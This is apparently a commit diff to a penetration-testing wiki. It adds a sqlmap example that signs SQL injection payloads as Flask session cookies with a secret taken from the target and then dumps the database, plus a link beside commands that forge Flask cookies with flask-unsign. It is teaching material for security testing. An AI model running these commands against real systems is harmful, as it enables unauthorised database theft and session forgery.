GitBook: [master] 2 pages modified

carlospolop · gitbook-bot · commit b5e2b35d2a5f · 2021-06-25T15:27:40.000Z
diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md
@@ -91,6 +91,14 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 --string="string_showed_when_TRUE" 
 ```
 
+### Eval
+
+**Sqlmap** allows the use of `-e` or `--eval` to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the **flask cookie session** **is signed by flask with the known secret before sending it**:
+
+```bash
+sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
+```
+
 ### Shell
 
 ```bash
diff --git a/pentesting/pentesting-web/flask.md b/pentesting/pentesting-web/flask.md
@@ -54,5 +54,7 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
 flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
 ```
 
-#### 
+### SQLi in Flask session cookie with SQLmap
+
+[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) ****uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
 
